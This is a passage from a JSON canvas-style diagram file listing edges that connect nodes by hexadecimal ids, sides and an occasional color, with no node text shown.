		{"id":"f6d35fb339fc6b50","fromNode":"664adbb7ea9bdbbc","fromSide":"left","toNode":"053e7e8f3c315c09","toSide":"right"},
		{"id":"f0e1d92630061260","fromNode":"1ca60381a66b2f39","fromSide":"right","toNode":"053e7e8f3c315c09","toSide":"left","color":"3"},
		{"id":"423123fa0bc26b3b","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"27670e51f3e77954","toSide":"left"},
		{"id":"e2b242aaaba1934b","fromNode":"27670e51f3e77954","fromSide":"right","toNode":"732d7c2c11f71f65","toSide":"left"},
		{"id":"e50e85d0db9b667d","fromNode":"732d7c2c11f71f65","fromSide":"right","toNode":"93849ad34b5459f2","toSide":"left"},
		{"id":"691b05f84721cc64","fromNode":"93849ad34b5459f2","fromSide":"right","toNode":"1ca60381a66b2f39","toSide":"left"},
		{"id":"40b3d263ffafdaf7","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"42730656212191a2","toSide":"right"},
		{"id":"33104f60bcc2f611","fromNode":"42730656212191a2","fromSide":"left","toNode":"e74258decaf9ca8c","toSide":"right"},
		{"id":"34fae78e6469ebe8","fromNode":"e74258decaf9ca8c","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"a61e3b791f764403","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"150f8925c89b03a9","toSide":"right"},
		{"id":"40deb4f302546329","fromNode":"150f8925c89b03a9","fromSide":"left","toNode":"0c49a86fdbccf304","toSide":"right"},
		{"id":"8633bee524cc109a","fromNode":"0c49a86fdbccf304","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"1720f22ad769c477","fromNode":"0b5430109f1aee95","fromSide":"right","toNode":"457185bcd0b2c56f","toSide":"left"},
		{"id":"485bb42abdf9c80d","fromNode":"a6b0107ca202cb70","fromSide":"right","toNode":"0b5430109f1aee95","toSide":"left"},
		{"id":"2d3d12988fdca7eb","fromNode":"457185bcd0b2c56f","fromSide":"right","toNode":"14f23e71f8aef871","toSide":"left"}
	]
}